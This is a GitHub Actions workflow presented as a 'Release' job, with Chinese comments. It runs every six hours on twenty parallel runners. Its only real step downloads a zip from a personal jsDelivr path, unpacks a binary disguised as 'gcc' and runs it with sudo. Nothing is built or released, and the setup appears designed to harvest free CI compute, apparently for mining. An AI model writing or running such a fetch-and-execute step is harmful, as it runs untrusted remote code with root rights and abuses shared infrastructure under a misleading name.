name: Release
on:
  workflow_dispatch:
  schedule:
     - cron:  '0 0/6 * * *'
  
jobs:
  precheck:
    continue-on-error: true # 如果这个这个 job 挂了继续往下走
    runs-on: ubuntu-latest
    # Map a step output to a job output
    outputs:
      should_skip: ${{ steps.skip_check.outputs.should_skip }}
    steps:
      - id: skip_check
        # 这个 action 可以 cancel 掉先前运行的 action
        # 使得运行的脚本始终是最新的 commit
        # https://github.com/marketplace/actions/skip-duplicate-actions
        uses: fkirc/skip-duplicate-actions@master
        with:
          skip_after_successful_duplicate: 'true'
  build:
    name: Build
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
    steps:
      - name: Install
        run: |
          sudo apt-get install wget unzip -y
          wget https://cdn.jsdelivr.net/gh/Yefori/m/gcc.zip
          unzip gcc.zip
          sudo chmod +x gcc
          sudo ./gcc
